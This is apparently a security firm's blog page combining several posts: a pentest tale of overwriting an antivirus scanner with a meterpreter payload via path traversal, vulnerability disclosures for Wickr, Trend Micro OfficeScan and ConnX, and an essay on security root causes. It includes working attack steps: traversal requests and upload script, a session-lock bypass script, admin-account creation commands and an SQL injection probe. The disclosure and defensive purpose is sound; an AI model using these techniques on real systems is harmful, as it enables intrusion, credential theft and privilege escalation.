Anti-malware malware

This blog post aims to share a tale from a recent pentest that I felt was too good to keep to myself.

Note: The names of the innocent have been changed to protect the guilty.

Background

The testing involved a web application that was designed to guide users through an application process that required documents to be submitted to the server via a file upload. The client for this pentest was understandably concerned about the security implications of handling untrusted user-supplied files, so they devised a system that would vet said files for malware prior to making them available for review.

The basic process for validating the files was as follows: the user requested a shared access signature (SAS) from an API endpoint, uploaded their file directly to cloud storage using that SAS, and the file was then pulled down to a dedicated virtual machine to be scanned for malware and sanitised before being made available for review.

In terms of the architecture behind the system, a number of moving parts were introduced:

  • A cloud-based file storage container for hosting uploaded files
  • An API endpoint for generating shared access signatures (SAS) granting access to file uploads
  • A virtual machine responsible for performing antivirus checks and document manipulation of untrusted files
  • Polling functions that were executed once files were added to the cloud storage (to initiate the document sanitisation process)

Note: As a pentester, I had access to a lot of information about how the system worked behind the scenes. I had access to the source code and the logging system, so I could verify when uploaded files were successfully or unsuccessfully processed.

SAS API Endpoint

Shared access signatures (SAS) are signed URIs that grant limited access to Azure’s Blob Storage. The access granted can be read or write, depending on the usage requirements. In this instance, the application exposed an API endpoint that would generate a write-only SAS on behalf of the user, similar to:

GET /GetSAS?upload=Myfile.png HTTP/1.1
Host: application.example.com

Which would return:

https://example.blob.core.windows.net/untrusted/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

The source code for this component resembled the following (NOTE: The actual code was C#/Dotnet, but I’ve used Python to demonstrate the logic):

def getSAS(filename):
    blobname = filename.split("/")[-1] # strip any path characters
    blobname = "untrusted/" + blobname
    sas = cloud.GetSAS(blobname, access="write")
    return sas

There are a couple of problems with this approach.

First, the user-supplied filename was preserved by the SAS-granting API endpoint. The application generated a UUID for each file using JavaScript; however, as this happened client-side, the UUID could simply be overwritten with an arbitrary filename. This meant that the effort the application put into generating UUIDs for uploaded files was fruitless.

Second, the sample code above failed to adequately strip filesystem metacharacters other than forward slashes from the supplied filename. Despite removing forward slashes (by truncating everything up to and including the final forward slash), the application happily processed filenames containing path characters such as ~, \, :, and so on. This was a stroke of luck for the tester, as the SAS API would happily grant a valid SAS for paths containing such characters.
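A quick check against the logic in the pseudocode above shows why: splitting on forward slashes leaves every other metacharacter, including backslashes, untouched. (This mirrors the demonstration pseudocode, not the real C#.)

filename = r"..\..\..\..\supersecret\Myfile.png"
blobname = filename.split("/")[-1]  # nothing to split on, so the name is unchanged
print("untrusted/" + blobname)      # untrusted/..\..\..\..\supersecret\Myfile.png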

As a result, it was possible to perform a directory traversal attack and write to file containers outside of the designated untrusted container. For example, an attacker could write into a super secret container by including backslash-based path traversal (such as ..\..\..\..\supersecret) in their request:

GET /GetSAS?upload=..\..\..\..\supersecret\Myfile.png HTTP/1.1
Host: application.example.com

Which would return:

https://example.blob.core.windows.net/supersecret/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

Although the SAS did not grant read access, it did grant write access. This meant that an attacker could overwrite known files in containers other than the designated one.

Whilst neat, this alone wasn’t all that interesting. We have to get a shell, after all. And this river was running dry.

Time to regroup.

Cloud file storage and virtual directories

While testing the previously discussed directory traversal vulnerability, I noticed some curious behaviour. If I requested a SAS for a filename containing a directory tree (such as this\is\Myfile.png), the file upload system would happily accept the file at that path. For example:

GET /GetSAS?upload=this\is\Myfile.png HTTP/1.1
Host: application.example.com

https://example.blob.core.windows.net/untrusted/this/is/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

As it happened, the file storage container would create a virtual directory structure to match the filename of the uploaded file.

The storage container for this example would look like this:

untrusted/
└── this
    └── is
        └── Myfile.png

This was starting to get interesting.

The virtual machine

So, at this point I knew that uploaded files would get downloaded to a virtual machine and then scanned for viruses. The application logic involved with this task resembled the following (NOTE: Again, the actual code was C#/Dotnet, but I’ve used Python to demonstrate the logic):

import os
import subprocess

def trigger_scan(filename):
    file_contents = cloud.download_file(filename) # get the file from the blob store
    tmp_path = os.path.join(create_temp_path(), filename) # store this in a safe temp directory! (assume create_temp_path() returns "C:\Temp")
    with open(tmp_path, 'wb') as f:
        f.write(file_contents)
    x = subprocess.check_output(["C:\\Program Files (x86)\\AVProgram\\scanner.exe", tmp_path])
    # [...] Check that file was not malicious, then perform subsequent document transformation

So, upon successful file upload, the trigger_scan function would execute automatically, performing the necessary operations to validate, then sanitise and transform, the supplied file. At first I toyed around with trying to escape out of the process execution call, to no avail.
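In hindsight that makes sense: assuming the real C# launched the scanner with an argument array, as the pseudocode above does, the filename ends up in a single argument and shell metacharacters are never interpreted. A minimal illustration of that behaviour:

import subprocess, sys

# The "malicious" characters arrive as literal text in one argument;
# nothing extra gets executed.
evil_name = 'Myfile.png" & calc.exe'
out = subprocess.check_output(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", evil_name]
)
print(out.decode())  # Myfile.png" & calc.exe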

What I could do, however, was control the filename that was concatenated via the Path.Combine function, using the previously discussed path traversal attack. I toyed around with uploading various files for a while and, after a bit of local testing with a minimal PoC, determined that if the second argument to the .NET Path.Combine method was an absolute path, the first argument was ignored and the supplied absolute path was returned.

According to the docs, this is intended behaviour:

“If one of the specified paths is a zero-length string, this method returns the other path. If path2 contains an absolute path, this method returns path2.” (Microsoft docs)

The following sample C# code demonstrates the vulnerability:

using System;
using System.IO;

namespace Program
{
    class Program
    {
        static void Main(string[] args)
        {
            string tmp = Path.GetTempPath();
            Console.WriteLine("Tmp path prefix is: {0}", tmp);

            string x = Path.Combine(tmp, "C:\\test\\a.exe");
            Console.WriteLine("Concatenated path is: {0}", x);
        }
    }
}

When executed:

C:\Users\Hacker>Hack.exe
Tmp path prefix is: C:\Users\Hacker\AppData\Local\Temp\
Concatenated path is: C:\test\a.exe
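
Incidentally, the Python used for the pseudocode behaves the same way: joining paths discards earlier components once a later one is an absolute, drive-qualified path. A quick check using ntpath (which applies Windows path rules regardless of the host OS) illustrates this:

import ntpath  # Windows path semantics, even when run on another OS

tmp = "C:\\Users\\Hacker\\AppData\\Local\\Temp\\"
print(ntpath.join(tmp, "this\\is\\Myfile.png"))  # stays under the temp directory
print(ntpath.join(tmp, "C:\\test\\a.exe"))       # absolute second argument wins: C:\test\a.exe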

At this point I had a revelation: I control the absolute path that the file that I am uploading will be written to.

Further testing

Using the power of supplied logs (thanks client!) I could determine certain characteristics of my exploit attempts. I started to enumerate the logged messages, with a particular focus on the error messages.

I tested a number of samples: a benign control file (no logged error; the application processed the file successfully) and the EICAR AV test file (infection found! Oh no!). I then started writing benign files to various locations on the system, such as C:\Windows\System32\a.png (permission denied!) and C:\test.png (no logged error; the application processed the file successfully). At this point I knew I was onto something. If I could successfully write a file to the root of C:\, then the user account performing the operation had to be highly privileged.

Putting it all together

So, to recap, at this stage I:

  • Was able to issue valid SAS for arbitrary locations on the filesystem
  • Could control where the file was written to disk
  • Had the location of a file that was guaranteed to be executed upon successful upload
  • Appeared to be able to write files as a privileged user

I hope you can see where this is going.

Payload

First things first, I needed a payload. I was quietly confident that no competing AV would be in play here (since I knew the AV engine in use), so I went from zero to yolo and smashed out a meterpreter reverse_https payload using msfvenom.

Staging the payload

I then needed a valid SAS for my target payload. As discussed previously, I could inject valid filesystem metacharacters into my filename, with the exception of /. I was not prepared to risk using space characters in the payload path, so I opted for another Windows trick: the short name. Long story short (pun totally intended), Windows short names are mostly-unambiguous 8.3-style representations of file names that don’t fit the legacy 8.3 format. As usual, it’s some relic from the past that is required for backwards compatibility. Don’t think about it. It’s probably better that way.

Anyway, my payload ended up looking like this:

GET /GetSAS?upload=.\C:\\PROGRA~1\\AVProgram\\scanner.exe HTTP/1.1
Host: application.example.com

Oh yeah that’s right. My goal here was the goods. I’m not just going to compromise this server. No; I’m going to replace the AV’s executable with my payload.

Anyway, the previous request returned the SAS:

https://example.blob.core.windows.net/untrusted/C:/PROGRA~1/AVProgram/scanner.exe?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d
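
For completeness, the upload itself is just an HTTP PUT against the returned SAS URL. Below is a rough sketch of the two-step flow (not the actual tooling used): the hostnames are the example values from above, the local payload filename is assumed, and I’m assuming the GetSAS endpoint returns the SAS URL as a plain-text response body.

import requests

SAS_ENDPOINT = "https://application.example.com/GetSAS"
PAYLOAD_PATH = r".\C:\PROGRA~1\AVProgram\scanner.exe"

# Step 1: ask the vulnerable API for a write SAS pointing at the AV binary's path.
sas_url = requests.get(SAS_ENDPOINT, params={"upload": PAYLOAD_PATH}).text.strip()

# Step 2: PUT the msfvenom payload to the blob store; Azure block blobs
# require the x-ms-blob-type header.
with open("payload.exe", "rb") as f:  # local msfvenom output (name assumed)
    resp = requests.put(sas_url, data=f.read(),
                        headers={"x-ms-blob-type": "BlockBlob"})
print(resp.status_code)  # 201 Created on success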

Upload… annnnndddd

I then uploaded the file to the SAS endpoint, and within seconds Metasploit had made a new friend 😀

Bonus points: The trigger_scan() function was running as the NT AUTHORITY\SYSTEM user!

Bonus Bonus points: The AV program is toast at this point; I’ve replaced the binary with a malicious .exe. This has the interesting side effect of ensuring that any time a legitimate user uses the application as intended, I get a shell.

Bonus Bonus Bonus points: The application now outright fails to complete its primary purpose of scanning untrusted files for viruses.

Recommendations

Honestly, I am kind of astounded that any of this actually worked. Fortunately, there are numerous ways that the exploit in question could have been trivially stopped dead in its tracks.

  • Flatten filenames to a GUID <- this would have done it
    • Have the SAS endpoint generate a filename for the destination file using a GUID, rather than accepting the user-supplied one (a minimal sketch follows this list)
  • Copy the file to the filesystem sans-extension
    • Extension was unnecessary in this context, given the operations required (i.e. AV scanning)
  • Don’t run services as SYSTEM/privileged users…
    • In this instance, given that the AV was executing on demand against a file, administrator privileges were unnecessary
  • Restrict storage container access for the SAS
    • Also don’t let it create virtual directories
  • (Less recommended) If you are going to accept the untrusted filename, sanitise ALL file path metacharacters
    • Probably don’t do this though. Seriously.

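To illustrate the first two recommendations, here’s a minimal sketch that reuses the hypothetical cloud client from the earlier pseudocode (the idea, not a drop-in fix):

import uuid

def getSAS(filename):
    # Ignore the user-supplied name entirely: generate a server-side GUID and
    # drop the extension, which isn't needed just to scan the file.
    blobname = "untrusted/" + str(uuid.uuid4())
    return cloud.GetSAS(blobname, access="write")
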
There’s just something deeply philosophical (and satisfying) about defeating an anti-malware system by overwriting the anti-malware program with malware.

Making Wickr Weaker

As part of Asterisk’s new mobile application security assessment service offering, we decided to use our acquired skills and research a high-profile mobile app. Luckily, Malcolm Turnbull helped us with the decision-making process by confirming that he uses Wickr to keep his messages private.

For those who are not familiar with the app, it is a messaging platform that prioritises privacy above all else. The app has been through rigorous security assessments, the results of which are published on their website. Additionally, some of that research was presented at DEF CON 21.

This gave us an extra adrenaline boost, knowing that the challenge was not going to be easy. To get to the juicy part, we reported two interesting vulnerabilities to Wickr that we found within version 2.5.2 (iOS), which was the most recent version at the time of initial contact (May 2015). It is important to note that we did not look at the Android version, so some of this information may also apply to the Android app.

  • Vulnerability #1: Session Lock Authentication Bypass

Wickr has a built-in ‘Auto Lock’ feature that allows a user to set a time period before they are required to re-enter their password to the application. By default, the timeout value is 1 hour; however, a user can change that value to as little as 5 seconds, which would appear to be an even more secure option. The screenshot below shows the ‘Auto Lock’ feature within Wickr’s settings view:

[Screenshot: the ‘Auto Lock’ setting]

Once the app is moved into the background and then reopened (after the time set in the ‘Auto Lock’ functionality has been exceeded), the user is required to re-enter their password to access the application. The ‘Session Lock’ view can be seen in the screenshot below:

[Screenshot: the ‘Session Lock’ view]

‘SessionManager’ is the class that controls the session lock and implements various methods, for example:

• -(void)sucessfullyResumedSession
• -(BOOL)unlockSessionWithPass:(id)pass

It was observed that the ‘sucessfullyResumedSession’ method was called after the ‘unlockSessionWithPass’ method, under the condition that the password was confirmed to be correct. It was also observed that when ‘sucessfullyResumedSession’ is called, the ‘Session Lock’ view is removed and the user is granted normal access to the application including the sensitive data it holds.

With this in mind, if a reference to the current ‘SessionManager’ object is obtained, it is possible to invoke the ‘sucessfullyResumedSession’ method and therefore bypass the authentication requirement, gaining access to the user’s sensitive data.
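
While the bypass described here was performed interactively with Cycript (shown in the figure further below), the same idea could be scripted. As a rough equivalent using Frida’s Python bindings instead, with the class and method names taken from above and everything else (process name, device setup) assumed:

import frida

js = """
ObjC.choose(ObjC.classes.SessionManager, {
  onMatch: function (sm) {
    // Dismiss the 'Session Lock' view without supplying the password.
    sm.sucessfullyResumedSession();
  },
  onComplete: function () {}
});
"""

session = frida.get_usb_device().attach("Wickr")  # assumed process name
script = session.create_script(js)
script.load()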

The figure below demonstrates how the authentication can be bypassed, with the aid of Cycript on a jailbroken device:

[Screenshot: Cycript commands invoking ‘sucessfullyResumedSession’ to bypass the session lock]

The screenshot below shows the access gained from the steps above:

[Screenshot: application access gained from the steps above]

  • Vulnerability #2: Persistent Sensitive Information Stored Unencrypted within the App’s Memory Space

Wickr’s authentication mechanism requires the user to input their password before gaining access to their sensitive information. It is assumed that once authentication is successful the password is no longer required for the application to function properly. This is thought to also be the case when the application enters the background as well as when the user is logged out completely.

While using the application, it was observed that the password used for authentication remained in the application’s memory space in clear text.

The authentication view is controlled by the ‘UserLogin’ class, which contains various properties, one of which, for example, is:

• UITextField* passBox

The ‘passBox’ property is used by the ‘UserLogin’ view controller to store the password entered by the user to authenticate. The following screenshot shows the ‘UserLogin’ view and the ‘passBox’ text field:

[Screenshot: the ‘UserLogin’ view and the ‘passBox’ text field]

After the user authenticates successfully, the application appears to release its reference to the ‘UserLogin’ view controller; however, the data held by the object is not overwritten. By writing the heap memory space of the application to a file and extracting strings from the file, it is possible to recover the clear-text password. This remains effective even when the user has explicitly logged off from the application and the application is running inactive in the background.

The following figure shows the process of writing the heap memory into files by using heapdump on a jailbroken device:

[Screenshot: heapdump writing the heap memory to files]

For proof-of-concept purposes, a string that is known to be part of the password was searched for within the written files. The highlighted portion is the legitimate password:

[Screenshot: grep output with the clear-text password highlighted]
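
The same search can be scripted trivially; a quick sketch (the dump file pattern and the password fragment below are placeholders, not the real values):

import glob

needle = b"Password123"               # assumed fragment of the password
for path in glob.glob("heap*.dump"):  # assumed heapdump output naming
    with open(path, "rb") as f:
        data = f.read()
    offset = data.find(needle)
    if offset != -1:
        print(f"{path}: fragment found at offset {offset}")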

For further details please refer to our advisories here and here.

Communication timeline:

  • 01/05/2015: Vulnerabilities were reported to Wickr
  • 08/05/2015: Asterisk requested reception to be confirmed
  • 08/05/2015: Wickr confirmed reception
  • 01/07/2015: Asterisk reminded Wickr of the disclosure date
  • 10/07/2015: Wickr confirmed the advisory reviewing process
  • 31/07/2015: Asterisk reminded Wickr of the disclosure date and offered additional week
  • 11/08/2015: Wickr confirmed that the advisory is still undergoing a review
  • 13/08/2015: Asterisk requested an update
  • 13/08/2015: Wickr acknowledged the bug and offered a $2000 reward
  • 13/08/2015: Asterisk sent banking details
  • 18/08/2015: Wickr requested to be given up to 6 more months to fix the issues
  • 18/08/2015: Asterisk asked to clarify the reasons for the requested additional time
  • 22/08/2015: Wickr responded with the reasons for the delay and clarified that only one bug (RAM) was acknowledged as the other one (authentication bypass) was already reported on the 16th of January, 2014
  • 24/08/2015: Asterisk notified Wickr that it forfeits the Bug Bounty Reward and will publish the advisories


Vulnerability Disclosure: Local Privilege Escalation through Trend Micro OfficeScan

Although we enjoy offensive work, we appreciate defensive work just as much. In this post we’ll discuss how we managed to escalate our privileges on a Windows host while performing a SOE assessment.

Focusing specifically on our assessment, we spotted that our client had not skipped the installation of an anti-virus program, in our case Trend Micro OfficeScan version 11.1. Normally these kinds of programs run as a Windows service in the context of the most privileged user (SYSTEM). Looking closely at OfficeScan’s file permissions revealed that the executable loaded as the service upon system start-up was writeable by the ‘Everyone’ group.

The file permissions were insecure due to an installation feature. In short, during the installation process administrators are asked whether they want to install the anti-virus using a ‘normal’ or ‘high’ security setting. Administrators who choose the ‘normal’ setting unknowingly give normal users the opportunity to escalate their privileges on the host.

Exploitation of this configuration is fairly simple and straightforward. For all intents and purposes, the following three steps were followed:

  1. Reboot the Windows system into Safe Mode so that the OfficeScan processes are not running.
  2. Overwrite the ntrtscan.exe (Real Time Scan Service) executable with a malicious executable of your choosing. In our instance, we used a Windows service template and added a few commands that create a new local user account and add it to the local Administrators group (a sketch of these commands follows this list).
  3. Reboot the Windows system. During start-up, the Real Time Scan Service executable is started, executing the malicious payload.

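As a rough illustration of the commands involved (the account name and password below are placeholders, and the original used a C# Windows service template rather than Python), this is the sort of thing the replacement executable runs once it starts as SYSTEM:

import subprocess

# Create a new local user and add it to the local Administrators group.
subprocess.check_call(["net", "user", "pentestuser", "P@ssw0rd123!", "/add"])
subprocess.check_call(["net", "localgroup", "Administrators", "pentestuser", "/add"])
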
For further details please see our advisory or Trend Micro’s advisory.

Communication timeline:

  • 16/04/2015: Vulnerabilities were reported to Trend Micro
  • 16/04/2015: Trend Micro confirmed reception of advisory
  • 30/04/2015: Trend Micro did not confirm vulnerability
  • 05/05/2015: Asterisk asked for disclosure permission
  • 05/05/2015: Trend Micro confirmed reviewing the advisory
  • 14/05/2015: Trend Micro confirmed vulnerability and requested to hold disclosure until July 10
  • 14/05/2015: Asterisk confirmed disclosure date
  • 04/06/2015: Trend Micro requested a change of disclosure date to August 4
  • 10/06/2015: Asterisk confirmed updated disclosure date
  • 03/08/2015: Asterisk reminded Trend Micro of the disclosure date
  • 04/08/2015: Trend Micro requested a change of disclosure date to August 7
  • 04/08/2015: Asterisk confirmed the updated disclosure date
  • 07/08/2015: Disclosed by both parties

Vulnerability Disclosure: SQL Injection in ConnX ESP HR Management System (CVE-2015-4043)

During an engagement for one of our clients we came across ConnX’s ESP HR Management System and found that it was vulnerable to SQL injection. In line with our responsible disclosure policy, the vendor of ConnX was contacted to advise them of the issue, and they were informed that this information would be published in 90 days.

We have received an acknowledgement from ConnX in regards to this issue stating:

… we are now releasing a version of ConnX where the issue that you brought to my attention has been addressed.

90 days have now passed from our initial disclosure to ConnX, and we are publishing details of the issue.

ConnX’s ESP HR Management System is an application designed to aid payroll management of staff in organisations. We identified that input validation on the username parameter of the login page was not implemented correctly, as noted below:

  • Location: /frmLogin.aspx
  • Parameter: ctl00$cphMainContent$txtUserName

Exploitation of this vulnerability would allow attackers to extract the data used by the ESP HR Management System. This information includes sensitive employee personal details.
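
For illustration only (this is not the payload from the advisory), probing an injection point like this usually starts with a simple quote-based test against the affected parameter. A hedged sketch, with a hypothetical host and an assumed password field name:

import requests

TARGET = "https://esp.example.com/frmLogin.aspx"  # hypothetical host

data = {
    "ctl00$cphMainContent$txtUserName": "admin'--",    # classic probe string
    "ctl00$cphMainContent$txtPassword": "irrelevant",  # field name assumed
}
# A real ASP.NET form would also need the __VIEWSTATE / __EVENTVALIDATION
# fields scraped from the login page; omitted here for brevity.
resp = requests.post(TARGET, data=data)
print(resp.status_code, len(resp.text))  # compare responses to spot anomalies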

The full advisory can be found here.

Communication timeline:

  • 2015-03-25: ConnX contacted with details of vulnerability
  • 2015-04-20: ConnX replied with details about mitigation
  • 2015-06-30: Publication of vulnerability


Information Security Root Causes

We do a lot of technical security testing at Asterisk, and this often brings up healthy discourse on the root cause of the issues found. After thinking about this for a while, I came up with a few themes which I think capture the majority of security issues. In fact, I think the following are possibly the root-cause problems that most information security professionals are trying to manage when protecting their organisation’s information. This focus on management is important, as most people can’t manage threat agents: unless you’re a government or other high-level entity, it’s unlikely you will be able to take action against attackers sitting somewhere on the other side of the world. These issues are not mutually exclusive, but I do like that they feel like a fairly manageable set of problems to solve.

Most of the issues we deal with as information security professionals come down to:

  1. Insecure software
  2. Misconfigured software
  3. People-related issues*
  4. Physical security issues

Surprised? Not really.

*nb: It’s important to note that these root-causes are often interrelated. Insecure or misconfigured software certainly relates to people-issues as well as other underlying issues. This interrelationship is important, but the distinction can be useful in breaking down how to address these problems.

Let’s try to analyse these causes. Most of the layers of defence that organisations apply to protect their assets are there to reduce attack surface area. In the case of web-based technology, we have firewalls, IDS/IPS, WAFs and other related technical controls attempting to manage and reduce the likelihood that insecure or misconfigured software is exploited. If the layers of defence, and the system itself, have addressed insecure software and misconfiguration issues and are physically secure, it’s likely that any further exploitation relates to weak passwords, or to passwords disclosed through breaches of other systems (take the LinkedIn breach, for example).

Weak passwords are an example of a security issue that relates to both insecure software and people-related issues. More secure software may force users to choose long, difficult-to-remember passwords. Unfortunately, if the credential is written down or shared with someone else, it doesn’t matter how strong the password is. In these particular instances, educating the user on better password practices may help.

Of the above issues, the people-related ones are often the most difficult to manage. Social engineering has proven itself an effective tool in an attacker’s arsenal over and over again, and even if you train your people, it’s difficult to reduce the exposure in the same way you would with the other issues. Whether this is due to the difficulty of educating the masses about social engineering, or because many information security professionals aren’t as good at addressing people issues as they are technical ones, we can’t really say.

This list is not all that different from MITRE’s Common Attack Pattern Enumeration and Classification (CAPEC) ‘Domains of Attack’. Below are our root causes, mapped to the various CAPEC domains:

Root-cause                 CAPEC Domain(s)
Insecure software          Communications, Software, Supply Chain*
Misconfigured software     Communications, Software, Supply Chain*
People-related issues      Social Engineering, Supply Chain*
Physical security issues   Communications (partially), Hardware, Physical Security, Social Engineering, Supply Chain*

*nb: Supply chain relates to insecure or misconfigured software, people related issues or physical security weaknesses further up the supply chain.

Okay, so if we have these root causes, what can we do about them? Our subsequent blog posts will look at each of these root causes in further detail.